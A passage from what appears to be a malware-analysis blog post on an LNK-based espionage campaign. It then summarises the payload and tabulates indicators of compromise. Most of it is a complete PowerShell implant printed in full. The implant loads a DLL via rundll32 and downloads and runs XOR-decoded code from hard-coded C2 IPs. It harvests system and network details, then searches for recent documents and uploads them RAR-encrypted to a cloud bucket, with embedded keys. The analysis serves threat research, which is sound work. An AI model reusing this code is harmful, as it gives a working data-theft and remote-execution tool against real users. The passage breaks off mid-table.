mv -fo "$env:tmp\xgihT\Rar.exe" "$env:AppData\WinRAR\";
mv -fo "$env:tmp\xgihT\FLrzH.w" "$env:tmp\..\";
If ($2.fullname.startswith($env:tmp)) {
    del -fo -r ("$env:tmp\"+$2.basename);
    rni -fo "$env:tmp\xgihT" $2.basename;
    ii ("$env:tmp\"+$2.basename+"\")
    }
Else {
    del -fo $2;
    md -fo $2.basename;
    mv -fo "$env:tmp\xgihT\*" $2.basename;
    del -fo -r "$env:tmp\xgihT";
    ii "$($2.basename)\"
    }
If (test-path $env:tmp\backups) {
    If (((get-date)-(get-item $env:tmp\backups).LastAccessTime).totalminutes -le 60) {
        exit
    }
    del -fo -r "$env:tmp\backups"
}
If (test-path "$env:tmp\..\FLrzH.w") {
    rundll32 "$env:tmp\..\FLrzH.w",DllRegister `
    "powershell -w hidden `
    ""Function we8([String]`$3,`$7='MD5'){`$g=New-Object System.Text.StringBuilder;`
        `$9=[System.Security.Cryptography.HashAlgorithm]::Create(`$7).ComputeHash([System.Text.Encoding]::UTF8.GetBytes(`$3));`
        foreach(`$1 in `$9) {`
            [Void]`$g.Append(`$1.ToString('x2'))`
        }`
        `$w=`$g.ToString();`
        `$e=`$w.substring(0,12);`
        return `$e}`
        Function qv1 (`$3) {`
            `$w=[System.Text.Encoding]::UTF8;`
            `$x=`$w.GetBytes('s');`
            `$s=`$(for(`$e=0;`
            `$e -lt `$3.length;) {`
                for(`$g=0;`$g -lt `$x.length;`$g++) {`
                    `$3[`$e] -bxor `$x[`$g];`
                    `$e++;If(`$e -ge `$3.Length) {`
                        `$g=`$x.length`
                    }`
                }`
            }`);`
            `$7=`$w.GetString(`$s);`
            return `$7`
        }`
        Function qc4 {`
            `$s=0;`
            `$q=`$m.length;`
            while (1) {`
                `$w=@();`
                `$7=Get-WmiObject win32_networkadapterconfiguration;`
                foreach(`$zv7 in `$7) {`
                    If(`$zv7.macaddress) {`
                        `$w+=`$zv7.macaddress`
                    }`
                }`
                `$zv7=@();`
                foreach(`$ij4 in `$w) {`
                    If(`$ij4.contains(':')) {`
                        `$zv7+=`$ij4.substring(0,17) -replace ':',''`
                    }`
                }`
                `$zv7=`$zv7|sort;`
                `$zy3=we8 (`$zv7[-1]+`$env:username);`
                `$xi2=new-object System.Net.WebClient;`
                `$xi2.headers.add('user-agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like DA) Chrome/62.0.3202.94 Safari/.36');`
                `$xi2.headers.add('Cookie','PHPSESSID='+`$zy3+'; csrftoken=u32t4o3tb3lbj'+`$v+'; _gat='+`$u+';');`
                try {`
                    `$0=`$xi2.DownloadString(`$m[`$s]);`$ri8=`$0.split(' ');`
                    `$jd4= `$ri8.Length;`
                    `$qw2=new-object int[] `$jd4;`
                    for(`$e=0;`$e -lt `$jd4;`$e+=1) {`
                        `$qw2[`$e]=[int]`$ri8[`$e]`
                    }`
                    `$0=qv1 `$qw2;iex `$0;`
                    while(1) {`
                        try {`
                            ROAGC `$8 `$u `$m `$a `$zy3`
                        }`
                        catch {}`
                    }`
                }`
                catch {`
                    If(`$s -lt (`$q-1)) {`
                        `$s+=1`
                    }`
                    Else {`
                        `$s=0`
                    }`
                }`
                Start-Sleep -s 180`
            }`
        }`
        `$v='';`
        `$0=[System.Text.Encoding]::Default.EncodingName;`
        If(`$0.endswith('jis)')) {`
            `$v='5'`
        }`
        Elseif(`$0.endswith('f-16)')) {`
            `$v='4'`
        }`
        Elseif(`$0.endswith('M437)')) {`
            `$v='3'`
        }`
        Elseif(`$0.endswith('g5)')) {`
            `$v='1'`
        }`
        Elseif(`$0.endswith('12)')) {`
            `$v='0'`
        }`
        Else {`$v='2'}`
        `$0='http://159.65.74.97;http://159.65.127.93;http://128.199.73.43';`
        `$m=`$0.split(';');`
        `$a='o19JOAiPTbSozNpAcIRYRy20E/sAYzrJxFzmsAQTbBo=';`
        `$u='REDACTED';`
        `$8=10;`
        `$0=-join(get-random ([char[]](65..90+97..122)) -c 7 -s `$([int](get-date -f yyyMd)));`
        `$nl7=new-object system.threading.mutex(0,`$0);`
        If (`$nl7.waitone(1)) {`
            try {`
                qc4`
            }`
            finally {`
                `$nl7.releasemutex()`
            }`
        }`
    """
}
md -fo "$env:tmp\backups";

Function u65($9) {
    [system.gc]::collect();
    $6=[System.Net.WebRequest]::Create($9.Uri1);
    $6.proxy=$Null;
    $6.keepalive=$False;
    $6.Method=$9.Method1;
    If ($9.Header2.count) {
        foreach($1 in $9.Header2.getenumerator()) {
            If ($1.name) {
                $6.Headers.Add($1.name, $1.value)
            }
        }   
    }
    $6.AllowAutoRedirect=$False;
    $6.ContentLength=$9.Body.Length;
    $x=$6.GetRequestStream();
    $x.Write($9.Body,0,$9.Body.Length);
    $t=$6.GetResponse();
    If ($9.GData) {
        $r=$t.GetResponseStream();
        $e=New-Object System.IO.StreamReader $r;
        $n=$e.ReadToEnd()
        }
    If ($t -ne $Null) {
        $t.close()
        }
    If ($6 -ne $Null) {
        $6.abort()
        }
    If ($9.GData) {
        return ($t.statuscode,([xml]$n).InitiateMultipartUploadResult.UploadId)
        }
    return $t
}

Function v95($2,$p) {
    $e=New-Object System.Security.Cryptography.HMACSHA256;
    $e.key=$2;$2=$e.ComputeHash([Text.Encoding]::utf8.GetBytes($p));
    return $2
}

Function y79($p) {
    $9=[Security.Cryptography.HashAlgorithm]::Create("SHA256");
    $4=[Text.Encoding]::utf8.GetBytes($p);
    $h=$9.ComputeHash($4);
    return -join($h| % {"{0:x2}" -f $_})
}
Function ww2($9) {
    $c='/';
    If ($9.DIRNAME) {
        $c+="$($9.DIRNAME)/"
        }
    If ($9.FILENAME) {
        $c+=$9.FILENAME}$5='';
        ($9.CANON_HEAD.keys | sort) | % {$5+="$($_):$($9.CANON_HEAD[$_])`n"};
        $0="$($9.METHOD)`n$c`n$($9.QUERYS)`n$5`n$($9.SIGNHEAD)`n$($9.BODY_SIG)";
        return "AWS4-HMAC-SHA256`n$($9.ISODATE)`n$($9.DATE)/$($9.REGION)/s3/aws4_request`n$(y79 $0)"
}
        
Function i09($9) {
        $c=[convert]::frombase64string('+ji52ydI8GAan3Xej2sIhMfPEEATEQjehjYt2Nh+ZqQ=');
        $7=v95 $c $9.REGION;$i=v95 $7 "s3";
        $s=v95 $i "aws4_request";
        $2=v95 $s $9.CANON_REQ;return -join($2|%{"{0:x2}" -f $_})
}
    
Function en2($9,$6,$7) {
    $9.ISODATE='20180621T015829Z';
    $9.DATE=$9.ISODATE.split('T')[0];$9.CANON_HEAD=@{"host"=$9.HOSTURL;"x-amz-content-sha256"=$9.BODY_SIG;"x-amz-date"=$9.ISODATE};
    If ($9.FileMD5) {
        $9.CANON_HEAD.add('content-md5',$9.FileMD5)
    }
    $9.SIGNHEAD=($9.CANON_HEAD.keys|sort) -join ';';
    $9.CANON_REQ=ww2 $9;$9.CANON_SIG=i09 $9;
    $t=@{"x-amz-content-sha256"=$9.BODY_SIG;"x-amz-date"=$9.ISODATE;"Authorization"="AWS4-HMAC-SHA256 Credential=$($9.ACCESS_KEY)/$($9.DATE)/$($9.REGION)/s3/aws4_request, SignedHeaders=$($9.SIGNHEAD), Signature=$($9.CANON_SIG)"};If($9.FileMD5){$t.add('content-md5',$9.FileMD5)}$x="https://$($9.HOSTURL)/";
    If ($9.DIRNAME) {
        $x+="$($9.DIRNAME)/"
    }
    If ($9.FILENAME) {
        $x+=$9.FILENAME
    }
    If ($9.QUERYS) {
        $x+="?$($9.QUERYS)"
        }
    $b=@{Uri1=$x;Body=$6;Method1=$9.METHOD;Header2=$t;GData=$7};
    return $b
}
        
Function ts3($l,$x,$t) {
    $9=@{METHOD='POST';HOSTURL='05012.ams3.digitaloceanspaces.com';ACCESS_KEY='BVTTZPQUDF3W4Z7P3WTN';REGION='nyc3';DIRNAME=$x;FILENAME=$t.tostring()+$l.extension};
    $3=$False;
    $g=$False;
    try {
        $f=New-Object System.IO.FileStream $l.fullname, 'Open';
        If ($f.Length -gt 5Mb) {
            $g=$True;
            $i=New-Object System.Xml.XmlDocument;
            $4=$i.Createelement('CompleteMultipartUpload');
            $9.QUERYS='uploads=';
            $9.BODY_SIG=y79 '';
            $b=en2 $9 '' $True;
            $0=u65 $b;
            $n=[int]$0[0];
            $x=$0[1]
        }
    }
    catch {}
    If ($n -eq 200 -or -not $g) {
        $t=0;
        $o=0;
        $h=1;
        $2=5Mb;
        try {
            [byte[]]$6=New-Object byte[] $2;
            while ($o -le 10) {
                $o+=1;
                $w=[Math]::Min($2,$f.Length-$t);
                If ($w -lt $2) {
                    [byte[]]$6=New-Object byte[] $w
                }
                $q=$f.Read($6,0,$w);
                If ($q -ne $w) {
                    break
                }
                $q=New-Object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider;
                $9.METHOD='PUT';
                $9.BODY_SIG='UNSIGNED-PAYLOAD';
                $9.FileMD5=[convert]::tobase64string($q.ComputeHash($6));
                If ($g) {
                    $9.QUERYS="partNumber=$h&uploadId=$x"
                }
                $b=en2 $9 $6 $False;
                $0=u65 $b;
                $n=[int]$0.StatusCode;
                If ($n -eq 200) {
                    If ($g) {
                        $q=$i.Createelement('Part');
                        $p=$i.Createelement('PartNumber');
                        $p.innertext=$h;
                        [void]$q.appendchild($p);
                        $6=$i.Createelement('ETag');
                        $6.innertext=$0.Headers['etag'];
                        [void]$q.appendchild($6);
                        [void]$4.appendchild($q);
                        $h+=1;
                        $t+=$w
                    }
                    else {
                        $3=$True
                    }
                    If ($t -eq $f.Length) {
                        break
                    }
                }
                else {
                    If ($f.Position -ne $t) {
                        [void]$f.Seek($t,[System.IO.SeekOrigin]::Begin)
                    }
                }
            }
            If ($g) {
                $9.METHOD='POST';
                $g=[byte[]][char[]]$4.outerxml;
                $9.BODY_SIG=y79 $4.outerxml;
                $9.QUERYS="uploadId=$x";
                $9.FileMD5='';
                $b=en2 $9 $g $False;
                $0=u65 $b;
                If ([int]$0.StatusCode -eq 200) {
                    $3=$True
                }
            }
        }
        catch {
        }
    }
    $f.Close();
    $f.Dispose();
    return $3
}

Function x56($6,$g,$f) {
    iex ("& '$env:AppData\WinRAR\Rar.exe' a -ep1 -y -hp$6 '$g' '$f'") | out-null;
    If (!(test-path $g)) {
        makecab "$f" "$g" | out-null
    }
}

Function zm7($l,$n,$g,$y,$x) {
    $s="["+$g+"] "+($l.fullName)+"     Size:"+($l.Length/1kb)+"KB     Time:"+($l.LastWriteTime);
    Try {
        gc $l.fullname -fo -total 0 -erroraction stop;
        $7=$True;
        If ($l.extension -eq '.txt' -and $l.Length -gt 10KB) {
            $7=$False
        }
        If ($n -eq $_.Length) {
            $7=$False
        }
        If ($l.Length -le 100MB -and $l.Length -gt 0 -and $7) {
            $9="$env:tmp\backups\$g.rar";
            x56 $j $9 $l.fullName;
            If (test-path $9) {
                $9=gi -fo $9
            }
            Else {
                $9=$l
            }
            If (ts3 $9 $x $y) {
                $s+=" ($y)OK`r`n";
                sleep -s 1
            }
            Else {
                $s+=" (Error)`r`n"
            }
            If ($9.extension -eq '.rar') {
                del -fo $9.fullname
            }
        }
        Else {
            $s+="[!Size or Duplicate!]`r`n"
        }
    }
    Catch {
        $s+="[!Access denied!!]`r`n"
    }
    return $s
}

Function sr2($j,$x) {
    $6=180;
    $y=1;
    $b=0;
    $e=(Get-Date -f yyyyMMddhhmmss)+"`r`nWeek:`r`n";
    $n=0;
    $f=('.doc','.docx','.pdf','.ppt','.pptx','.xls','.xlsx','.wps','.wpp','.et','.txt');
    gci "$env:appdata\Microsoft\Windows\Recent\" -fo -errora silentlycontinue | ? { $f -contains [io.path]::getextension($_.basename) -and $_.LastWriteTime -ge (Get-Date).AddDays(-7)} | % {gi ((new-object -com wscript.shell).createshortcut($_.fullname)).targetpath -fo -errora silentlycontinue} | % {$b+=1;$e+=zm7 $_ $n $b $y $x;$n=$_.Length;
        If ($e.endswith("OK`r`n")) {
            $y+=1
        }};
        $5=@();
        $5+=gdr -p 'fi*' | ? {$_.root -ne "$env:systemdrive\"} | % {gci -fo $_.root};
        $5+=gci -fo "$env:systemdrive\users";
        $5+=gci -fo "$env:systemdrive\" | ? {$_.fullname -notlike '*:\Windows*' -and $_.fullname -notlike '*:\Users' -and $_.fullname -notlike '*:\Program Files*' -and $_.fullname -notlike '*:\ProgramData' -and $_.fullname -notlike '*:\MSOCache' -and $_.fullname -notlike '*:\PerfLogs' -and $_.fullname -notlike '*:\System Volume*' -and $_.fullname -notlike '*:\Documents and Settings' -and $_.fullname -notlike '*:\Recovery' -and $_.fullname -notlike '*:\Boot'};
        $5=$5 | sort lastwritetime -des | % {$_.fullname} | ? {$_};
        $e+="Search List:`r`n$5`r`n";
        $c=0;
        If ($6 -ge 30){
            $r=30
        }
        Else {
            $r=$6
        }
        $p=Get-Date;
        $k=1;
        $n=0;
        while ($6 -ge $r) {
            $e+="M $k (D $c - D $r):`r`n";
            foreach ($d in (('.doc','.docx','.pdf'),('.ppt','.pptx','.xls','.xlsx','.wps','.wpp','.et'),('.txt','.eml'))) {
                $e+="FileType: $d`r`n";
                foreach ($4 in $5) {
                    Try {
                        gci $4 -r -fo -errora silentlycontinue | ? {$d -contains $_.extension -and $_.LastWriteTime -lt $p.AddDays(-1*$c) -and $_.LastWriteTime -ge $p.AddDays(-1*$r) } | % {$b+=1;$e+=zm7 $_ $n $b $y $x;$n=$_.Length;
                            If ($e.endswith("OK`r`n")) { 
                                $y+=1
                            }
                        }
                    }
                    catch {
                        $e+="[!!!$4 search error !!!]`r`n"
                    }
                }
            }
            $e+=(Get-Date -f yyyyMMddhhmmss)+"`r`n";
            $e+=(get-wmiobject win32_process -f "name='powershell.exe'" | % {$_.commandline+"`r`n"});
            $e > "$env:tmp\$($k)test.txt";
            $e="$env:tmp\$($k)test.txt";
            x56 $j "$env:tmp\backups\M$k.rar" $e;
            ts3 (gi -fo "$env:tmp\backups\M$k.rar") $x "M$k";
            del -fo $e,"$env:tmp\backups\M$k.rar";
            $e='';
            If ($6 -le $r) {
                break
            }
            $r+=30;
            $c+=30;
            If ($6 -le $r) {
                $r=$6
            }
            $k+=1
        }
        $p=0;
        $k=0;
    while(1) {
        sleep -s 3500;
        md -fo "$env:tmp\backups";
        $x=(hostname)+"_P"+(Get-Date -f yyyyMMddhhmmss)+"_REDACTED";
        $y=1;$n=0;$k+=1;$e="$x`r`n";
        gci "$env:appdata\Microsoft\Windows\Recent\" -fo -errora silentlycontinue | ? {$f -contains [io.path]::getextension($_.basename) -and $_.LastWriteTime -ge (Get-Date).AddHours(-1) } | % {gi ((new-object -com wscript.shell).createshortcut($_.fullname)).targetpath -fo -errora silentlycontinue} | % {$b+=1;$e+=zm7 $_ $n $b $y $x;$n=$_.Length;
            If ($e.endswith("OK`r`n")) {
                $y+=1
            }
        };
        $f='';
        $e+=(Get-Date -f yyyyMMddhhmmss)+"`r`n";
        $e > "$env:tmp\$($k)test.txt";
        $e="$env:tmp\$($k)test.txt";
        x56 $j "$env:tmp\backups\P$k.rar" $e;
        ts3 (gi -fo "$env:tmp\backups\P$k.rar") $x "P$k";
        del -fo $e,"$env:tmp\backups\P$k.rar"
    }
}

[System.Net.ServicePointManager]::DefaultConnectionLimit=50;[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
$s=(hostname)+"_"+(Get-Date -f yyyyMMddhhmmss)+"_REDACTED";
$m='http://159.65.74.97;http://159.65.127.93;http://128.199.73.43';
$p=$m.split(";");
$q=$p.length;
$l=0;
$w="";
while ($l -lt $q) {
    try {
        $9=[System.Net.WebRequest]::Create($p[$l]);
        $w+=$l.ToString();
        $3=$9.GetResponse();
        $w+=" OK`r`n"
    }
    catch {
        $w+=" BAD!`r`n"
    }
    $l+=1
}
$w+=(Get-Date -f yyyyMMddhhmmss)+"`r`n";
$w+="systeminfo:`r`n"+(systeminfo)+"`r`n";
$w+="ipconfig /all:`r`n"+(ipconfig /all)+"`r`n";
$w+="netstat -a:`r`n"+(netstat -a)+"`r`n";
$w+="arp -a:`r`n"+(arp -a)+"`r`n";
$w+="desktop files:`r`n"+(ls -r $home\desktop)+"`r`n";$w+="tmp files:`r`n"+(ls $env:tmp\..\)+"`r`n";$w+="pw cmd:`r`n"+(get-wmiobject win32_process -f "name='powershell.exe'" | % {$_.commandline+"`r`n"});
$w+="programfiles:`r`n"+(ls $env:programfiles)+"`r`n";
$w+="programfiles x86:`r`n"+(ls ${env:programfiles(x86)})+"`r`n";
$w+=(Get-Date -f yyyyMMddhhmmss)+"`r`n";
$w | out-file "$env:tmp\start.log" -Encoding UTF8;
$3=-join([char[]](48..57+65..90+97..122) | get-random -c 16);
$7=new-object security.cryptography.rsacryptoserviceprovider(2048);
$7.fromxmlstring("<RSAKeyValue><Modulus>4RKDLymbgSDghM7HHxZprfPfWcoBQDCL156NPOAsDRiLZ57zj8kcqjq/zgGFAuyhmfmaFBCRz75NIN33Ze105pNzOZXAO975/IpS4xNimVA7vmeEEAF7JQ+W3JMNnzXM5Tx1aMyiaSVY3k+07H45hPEiAJx07f/f94EDwTBNkhL3RN1B30+B75d/6sjn+T4u3bkZEx88LLwRQEQf/wO3Ey0OaH1i04prS6HC6R63XRPNCBYWUzDcTFYLidwqNBfBzwMRsPIoLdmav4BOdVNIubPhCINzT6FcaFyYB9kHsDXEM8o+Tou9eNhIBE1koJ9qjhGBFi+s20Sj3qE4mv8kpw==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>");
$7.encrypt([text.encoding]::utf8.getbytes("$3"),$False) > "$env:tmp\id";
iex ("& '$env:AppData\WinRAR\Rar.exe' a -ep1 -y '$env:tmp\id.rar' '$env:tmp\id'")|out-null;
while(!(ts3 (gi "$env:tmp\id.rar") $s 'id')){sleep -s 180}x56 $3 "$env:tmp\start.rar" "$env:tmp\start.log";
ts3 (gi "$env:tmp\start.rar") $s 'start';
del -fo "$env:tmp\id","$env:tmp\id.rar","$env:tmp\start.rar","$env:tmp\start.log";
sr2 $3 $s
</code></pre>
<p>The PowerShell scripts do vary between the samples, but maintain the same key features. Some have blocks of Base64 to obfuscate the calling of the DLL, while others have this code in the clear. Additionally, the PowerShell script passed as a parameter with the DLL does vary slightly.</p>
<p>But at a <strong>very</strong> high level, the PowerShell extracts out more data from the LNK file, expands that data into a temporary location, loads a malicious dll (with a further PowerShell script as a parameter), obtain user information and data, and encrypts it before sending it back to a C2 server. The 360 TIC report examines this code in depth.</p>
<p>To me, however, what stood out was a string which I have redacted<sup id="fnref:2"><a href="#fn:2" class="footnote-ref" role="doc-noteref">2</a></sup> appended to the collected data, which <em>could</em> refer to a username or social media handle to identify the origin of returned data.</p>
<div style="width: 75%; height: 75%; display: block; margin: 0 auto;" ><img src="/2020/02/reference_to_1.jpg" alt="reference_to" style="border: #000000 1px outset"></div>
<p>Looking at the other LNK samples more of these handle-type names were identified. Of these I was able to identify a social media account for at least two of these type of strings in the samples:</p>
<p>Summary of all the key IOCs from the PowerShell identifies possible handles and C2 infrastructure:</p>
<table style="border-collapse:collapse;border-spacing:0" class="tg"><tr><th style="font-family:Arial, sans-serif;font-size:12px;font-weight:bold;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:center;vertical-align:middle">Identifying String</th><th style="font-family:Arial, sans-serif;font-size:12px;font-weight:bold;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">SHA 256 Hash</th><th style="font-family:Arial, sans-serif;font-size:12px;font-weight:bold;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">IP Addresses</th><th style="font-family:Arial, sans-serif;font-size:12px;font-weight:bold;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">Storage Server</th><th style="font-family:Arial, sans-serif;font-size:12px;font-weight:bold;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">User Agent</th><th style="font-family:Arial, sans-serif;font-size:12px;font-weight:bold;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">Other</th></tr><tr><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:center;vertical-align:middle">String 1</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">20ad6fa72982a6ba0f9499361b2aa3a3<br>f5cca73fd397c2969d08a4c5f2866814</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">159.65.127.93<br>139.59.238.1<br>138.197.142.236</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">0123.nyc3.digitaloceanspaces.com</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like DA) Chrome/62.0.3202.94 Safari/.36</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">Embedded Base64 to execute DLL</td></tr><tr><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:center;vertical-align:middle">String 2</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">b0d7118d75c0f2a99fa5b319148b8914<br>8800e5db06ee403d6a31c451a8a54f2b</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">139.59.226.29<br>188.226.144.42<br>139.59.230.181</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">0123.nyc3.digitaloceanspaces.com</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like DA) Chrome/62.0.3202.94 Safari/.36</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">Embedded Base64 to execute DLL</td></tr><tr><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:center;vertical-align:middle">String 3</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">70b6961af57bce72b89103197c8897a4<br>ae3ce5fdb835ccd050f24acbac52900d</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">159.65.74.97<br>159.65.127.93<br>128.199.73.43<br></td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">05012.ams3.digitaloceanspaces.com</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like DA) Chrome/62.0.3202.94 Safari/.36</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle"></td></tr><tr><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:center;vertical-align:middle">String 1</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">ea6e7c9b9110c7c21062908be51dd3f8<br>81490b40b9b77a534fdc7812ab5cd2af</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">159.65.127.93<br>139.59.238.1<br>138.197.142.236</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">0123.nyc3.digitaloceanspaces.com</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like DA) Chrome/62.0.3202.94 Safari/.36</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">Embedded Base64 to execute DLL</td></tr><tr><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:center;vertical-align:middle">String 4</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">6ccad83fb9f7a50ac95e3e865a27be0<br>288279e76fcd3b5af495c6fcf6d58fa36</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">178.128.110.214<br>198.211.118.118<br>138.197.135.170<br>59.73.16.165<br></td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">N/A</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like DA) Chrome/62.0.3202.94 Safari/.36</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:center;vertical-align:middle">Using FTP server rather than Digital Ocean</td></tr></table>
<h3 id="hey-taxi-cab">Hey <del>Taxi!!</del> Cab!!</h3>
<p>The PowerShell further extracted a CAB file that contained further files: PDFs, DOCXs, DOCs, and JPEGs along with a DLL with a non-standard extension (e.g. <code>.g</code>), and a legitimate copy of <code>rar.exe</code>. The dropped files (<em>sans</em> the .dll, see below) are:</p>
<table style="border-collapse:collapse;border-spacing:0" class="tg"><tr><th style="font-family:Arial, sans-serif;font-size:10px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">String of Interest #</th><th style="font-family:Arial, sans-serif;font-size:10px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">LNK File Name</th><th style="font-family:Arial, sans-serif;font-size:10px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">Dropped Files</th><th style="font-family:Arial, sans-serif;font-size:10px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">Translated Dropped Files</th><th style="font-family:Arial, sans-serif;font-size:10px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">SHA256 Hashes</th></tr><tr><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">String 1</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">陈婧简历+作品.lnk</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">《互联网发展：信息与动态》7月刊原稿.docx<br>《中国工商报》官方微博作品.docx<br>陈婧+13957937111+简历.doc</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">"Internet Development: Information and Development" July Issue.docx<br>"China Business News" official Weibo works.docx<br>Chen Jing + 13957937111 + resume.doc</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 